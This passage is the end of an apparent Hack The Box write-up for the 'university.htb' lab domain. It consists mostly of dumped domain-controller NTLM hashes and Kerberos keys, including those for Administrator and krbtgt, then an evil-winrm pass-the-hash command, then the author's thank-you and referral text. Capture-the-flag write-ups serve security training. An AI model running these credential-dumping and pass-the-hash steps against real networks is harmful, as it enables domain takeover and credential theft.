Kareem.A\Kareem.A:1116:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Lisa.K\Lisa.K:1117:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Jakke.C\Jakken.C:1118:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Nya.R\Nya.R:1119:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Brose.W\Brose.W:1120:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Choco.L\Choco.L:1121:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Rose.L\Rose.L:1122:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Emma.H\Emma.H:1123:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
C.Freez\C.Freez:1124:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Martin.T\Martin.T:1127:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
William.B\William.B:1132:aad3b435b51404eeaad3b435b51404ee:a910f374f7e63717f112fb4e40122a7c:::
WS-3$:1134:aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34:::
GMSA-PClient01$:1140:aad3b435b51404eeaad3b435b51404ee:e5799ed7c404dead98cbe2fc610b9b1f:::
WS-1$:1141:aad3b435b51404eeaad3b435b51404ee:c23b84b12d7f2c758e4ca7da5b053c81:::
WS-2$:1142:aad3b435b51404eeaad3b435b51404ee:bfd5d3a7883cb6e0a63a29d0cdfd430c:::
WS-4$:1143:aad3b435b51404eeaad3b435b51404ee:c591cf4bcad09cc0eb5ba2b54e58b217:::
WS-5$:1144:aad3b435b51404eeaad3b435b51404ee:7427ac9458a4a39f5076ab080b1329b3:::
LAB-2$:1145:aad3b435b51404eeaad3b435b51404ee:93b3bf5940c921c6f072961d10c3f43f:::
SETUPMACHINE$:10101:aad3b435b51404eeaad3b435b51404ee:de634322e3b135e7fedbdf6655f4b30c:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:57165230d0d19617ca0963b38799c474dead2e2e0ecab979b3112686a51820d3
Administrator:aes128-cts-hmac-sha1-96:7ff72d9d3f65a3efa1fdae60fbb0d5f3
Administrator:des-cbc-md5:f2f17f2c16463886
DC$:aes256-cts-hmac-sha1-96:1e28d41c5f05d6d11bb85093b1dd37796d526e747f51aa75ab4cad3f3c90bfe7
DC$:aes128-cts-hmac-sha1-96:dd4911edcf56d2626325632928d0f45c
DC$:des-cbc-md5:9b58ab8a892fa81c
krbtgt:aes256-cts-hmac-sha1-96:52ce53d2030dd2687b36bec21c329f04b74938dc1e7793a93c4c9980835c7ef3
krbtgt:aes128-cts-hmac-sha1-96:79cdade7f3d4cfc5398ff6f82f4335ae
krbtgt:des-cbc-md5:fb7fae5ece8f9879
university.htb\John.D:aes256-cts-hmac-sha1-96:21dd09fe9814cab35b8cbc0f8195fb3d1264fd547317939e6a130ce3eb6b4511
university.htb\John.D:aes128-cts-hmac-sha1-96:10b1a2d48d658e4b1105e86e83f756dc
university.htb\John.D:des-cbc-md5:5bae86cdead37531
university.htb\George.A:aes256-cts-hmac-sha1-96:f6eb3c5bf98fdfb635b3c6da6ae98dc891e1ce3780d2e2ec2651c7f4eb983a40
university.htb\George.A:aes128-cts-hmac-sha1-96:6de8f3cdec17069761798c9029869298
university.htb\George.A:des-cbc-md5:29f7fedca13eb51a
WAO:aes256-cts-hmac-sha1-96:048f13833165f244e42d3c504243b93299b89ae3cd3f77f1e44072295977f8dc
WAO:aes128-cts-hmac-sha1-96:dae044fa1a5127dc73c1227cce87138e
WAO:des-cbc-md5:3b0b7fe99e0dd029
university.htb\hana:aes256-cts-hmac-sha1-96:e6672076fc6ff185b3b5b16b7748e1c2d79b082acc0e131005951a77b11a4183
university.htb\hana:aes128-cts-hmac-sha1-96:3ee719263aae39bc92fbb09bef9eee00
university.htb\hana:des-cbc-md5:bfec899213df4651
karma.watterson:aes256-cts-hmac-sha1-96:691ee7af21e7a7658d4f481a11e3b782eee8a94bb0ccb346ef254849545a8ed4
karma.watterson:aes128-cts-hmac-sha1-96:79bd278f4872e5b069a85e4d449ef02f
karma.watterson:des-cbc-md5:f20837bc94f10dfe
Alice.Z:aes256-cts-hmac-sha1-96:d82c6840941ac7267c79a322b9c7caa24fe1fe656d2624aeba6f32623296525e
Alice.Z:aes128-cts-hmac-sha1-96:efd562ce518fd8aabba4d9d2edef346c
Alice.Z:des-cbc-md5:cd2549808f75343b
Steven.P\Steven.P:aes256-cts-hmac-sha1-96:5707911aa507f986eea4c1d5f87ccf79f0a9de45f4a36f940c8bbd898e5e41bb
Steven.P\Steven.P:aes128-cts-hmac-sha1-96:bba36f53925ccb71e21cdb383ed67a0b
Steven.P\Steven.P:des-cbc-md5:ae1c45a23289190b
Karol.J\Karol.J:aes256-cts-hmac-sha1-96:56103c4cf610a125a6a23823c209dcdbe199ade01f94da4d332b01068bd6a740
Karol.J\Karol.J:aes128-cts-hmac-sha1-96:c9a2f8992302e113938d7750026f901c
Karol.J\Karol.J:des-cbc-md5:68e331b6dc2ad98c
Leon.K\Leon.K:aes256-cts-hmac-sha1-96:1ece984548eb4eba3c523bd3d2328e902ce479fdfb727099380f68f5a0d2cb49
Leon.K\Leon.K:aes128-cts-hmac-sha1-96:848593e19936039550019f28444a3da0
Leon.K\Leon.K:des-cbc-md5:c851b58316c8ce25
Anna.C\A.Crouz:aes256-cts-hmac-sha1-96:14574495c3560a737b1762d55472c20b556077aa4794f9694cc28c59705a42fe
Anna.C\A.Crouz:aes128-cts-hmac-sha1-96:3f018e7682f353b16cc7b620a0ef2f8c
Anna.C\A.Crouz:des-cbc-md5:1aa8a2ce75700115
Kai.K\Kai.K:aes256-cts-hmac-sha1-96:438fb0fbb03ef035a5853f9495f62b761fe14016039249d042b6cfbe5f111390
Kai.K\Kai.K:aes128-cts-hmac-sha1-96:e2d4eae38d843778e3a14f87377b4d37
Kai.K\Kai.K:des-cbc-md5:589def32ba38cb16
Arnold.G\Arnold.G:aes256-cts-hmac-sha1-96:4399fe126980a15d35bf04c8fef4055f411c8c856e7f5225e16c46c07342f127
Arnold.G\Arnold.G:aes128-cts-hmac-sha1-96:c5053f4f0840bda9ad2f13ba63ccbbbf
Arnold.G\Arnold.G:des-cbc-md5:32297623943723e0
Kareem.A\Kareem.A:aes256-cts-hmac-sha1-96:d0b4d84027baa07382b6b7e1db90f492316f2e2ebf103034ef90430f08739d4c
Kareem.A\Kareem.A:aes128-cts-hmac-sha1-96:8d70f6949ea4870a7558a285c579fd67
Kareem.A\Kareem.A:des-cbc-md5:022f34d3764f37f2
Lisa.K\Lisa.K:aes256-cts-hmac-sha1-96:5e4f6bd9805046070c85445d9475e3bab9bb5d136483ef06871c585f57f15a52
Lisa.K\Lisa.K:aes128-cts-hmac-sha1-96:4c4d6872dd1eaba8743844570bd1d93d
Lisa.K\Lisa.K:des-cbc-md5:e3510225071f7abc
Jakke.C\Jakken.C:aes256-cts-hmac-sha1-96:4c8a5426d5dbd5ab2eeca3d75075df687126a61fc94253c8edbedfe61243a58a
Jakke.C\Jakken.C:aes128-cts-hmac-sha1-96:2008f8400116981ca13052818b8b015f
Jakke.C\Jakken.C:des-cbc-md5:3b08b343ba0eb0b6
Nya.R\Nya.R:aes256-cts-hmac-sha1-96:fa49f32f8bceda29f095bbce0f6b421e4b5b46f497b5c0613758ff46ed12e18e
Nya.R\Nya.R:aes128-cts-hmac-sha1-96:6578cef55b3cad6ba22e83886cdeab7e
Nya.R\Nya.R:des-cbc-md5:b994f4d910ae01c2
Brose.W\Brose.W:aes256-cts-hmac-sha1-96:1113b12ff5b32fbda629aa1d5b841dcd049302fac33f0f7420313d4ed572d900
Brose.W\Brose.W:aes128-cts-hmac-sha1-96:da6945c6a3f4faddcad139f07a79f4b2
Brose.W\Brose.W:des-cbc-md5:703b0294f87968c2
Choco.L\Choco.L:aes256-cts-hmac-sha1-96:80f15a8852e6fd430ae10e0fdd5c4e4b2adac39a2a6d3f990ad198f50634fc26
Choco.L\Choco.L:aes128-cts-hmac-sha1-96:18af98f4bbadbe494f0c562ff81f3d51
Choco.L\Choco.L:des-cbc-md5:c494253bd35289b0
Rose.L\Rose.L:aes256-cts-hmac-sha1-96:94296b923765c8a823d3f3cdfd08207bcb5db26354080c82bbbcf4fbcdcf3836
Rose.L\Rose.L:aes128-cts-hmac-sha1-96:aaddb9f3fa962b4b34f4c4a5356df925
Rose.L\Rose.L:des-cbc-md5:469b6713c4292a5b
Emma.H\Emma.H:aes256-cts-hmac-sha1-96:05ce732c932e48edd7328a5af7b949519ade7d231616cce6c61406cb9e00231c
Emma.H\Emma.H:aes128-cts-hmac-sha1-96:1ec8641fe93994c480aa780d91017104
Emma.H\Emma.H:des-cbc-md5:62bf26da3b0b0b58
C.Freez\C.Freez:aes256-cts-hmac-sha1-96:68ce938782346c294888702a8f5c804dd5ca5ad794ad5fd0b0ad91e303bc1e98
C.Freez\C.Freez:aes128-cts-hmac-sha1-96:a382a211f93529aecf18ee77a29ab859
C.Freez\C.Freez:des-cbc-md5:6454387a684545df
Martin.T\Martin.T:aes256-cts-hmac-sha1-96:aab6592eb571149292bdf548ecfbbb9132956ef8fdccee4cf6234ac76a0298e8
Martin.T\Martin.T:aes128-cts-hmac-sha1-96:ea989c266229d4aaf5dbaa4463e33747
Martin.T\Martin.T:des-cbc-md5:07d525d957201a15
William.B\William.B:aes256-cts-hmac-sha1-96:983519579faa3198d9530cac738836a56df853eb096dac33ce4aa88fc5a31e3e
William.B\William.B:aes128-cts-hmac-sha1-96:d133f6d4851b032289ec98a662acbd39
William.B\William.B:des-cbc-md5:0e5431b02a68b557
WS-3$:aes256-cts-hmac-sha1-96:2f406f2fbc41fc6bdf08c7b49d048b145f595664ed770e33d1210c8ddeea43ed
WS-3$:aes128-cts-hmac-sha1-96:9536bafcc7f0f3eaa75666ce9dda4529
WS-3$:des-cbc-md5:dc2a76264abcfbfe
GMSA-PClient01$:aes256-cts-hmac-sha1-96:352cdbf0cd78625979044b7c084f4e2389b7ce574149908d6f7667bc9257dce8
GMSA-PClient01$:aes128-cts-hmac-sha1-96:dc67dee2694935710c5266115b41529d
GMSA-PClient01$:des-cbc-md5:a74f8a2cf7348083
WS-1$:aes256-cts-hmac-sha1-96:053d04f5d4bf72f11b17f4ef1f123da28587a24ae6d87006460ea721f53d5cf3
WS-1$:aes128-cts-hmac-sha1-96:2075e3e815e44ca3853d562c4a9c5453
WS-1$:des-cbc-md5:bad532a2a74f2a94
WS-2$:aes256-cts-hmac-sha1-96:45d320e28768dd31c13ccc4fc3186eb52104d480ad761d5cdc5bc54921a5d2c3
WS-2$:aes128-cts-hmac-sha1-96:f3a18ccdcadd1b0f9fa86720dc3730fe
WS-2$:des-cbc-md5:c1169115cb7c8c67
WS-4$:aes256-cts-hmac-sha1-96:57676ebc2adde9b1ad0c11126c330db1b561378f50b5298285d6120225ab7b2d
WS-4$:aes128-cts-hmac-sha1-96:fb811618c2a0938d27c45a64e78ca131
WS-4$:des-cbc-md5:dc4cb962e9252f2a
WS-5$:aes256-cts-hmac-sha1-96:efcc09c0abf92483eaa0cc85b7fbb200abcac40050ce34e92c433d2d40315871
WS-5$:aes128-cts-hmac-sha1-96:2e1145b05af8761e092c724435424044
WS-5$:des-cbc-md5:08c8c49d3e2c5ee9
LAB-2$:aes256-cts-hmac-sha1-96:053aa90f8888c1fbafa79d6e1eab4a8f1e9d8c93a3cc3e6977a37e475a0969cb
LAB-2$:aes128-cts-hmac-sha1-96:630cd5f5d00deb7f1cf8750c9e7028db
LAB-2$:des-cbc-md5:3815c8df0e231cf4
SETUPMACHINE$:aes256-cts-hmac-sha1-96:a25cec216af41c2b1c97a1a18218d5e8621a5b189ec2d48cd86dae25c69e8fe2
SETUPMACHINE$:aes128-cts-hmac-sha1-96:b9d572ce1335167db63bbee3c538dc85
SETUPMACHINE$:des-cbc-md5:c8d049dabc6dce75
[*] Cleaning up...Pass the hash with administrator on DC
$ evil-winrm -i 10.129.231.193 -u administrator -H "e63413bab01a0b8820983496c0be3a9a"
Hashes
在上面。
Thanks
Respect: If my writeup really helps you, Give me a respect to let me know, Thankssssss!
感謝: 製作不易,如果我的writeup真的幫到你了, 給我一個respect,這樣我就會知道,感謝你!
Found Mistakes: If you find something wrong in the page, please feel free email to mane@manesec.com thanksss !!!
發現一些錯誤: 如果你在文章中發現一些錯誤,請發郵件到 mane@manesec.com ,麻煩了!!
Beginner Recommand: If you are a beginner, please use this link to sign up for an HTB Academy to get more Higher level of knowledge.
新手非常推薦: 如果你是初學者,可以用此鏈接來嘗試注冊 HTB Academy 賬號。
使用上面的鏈接加入 HTB 的 academy 完成 INTRODUCTION TO ACADEMY 這個模塊后可以解鎖更多的功能!
Join HTB's academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)
Copyright © 2016-2025 manesec. All rights (include theme) reserved.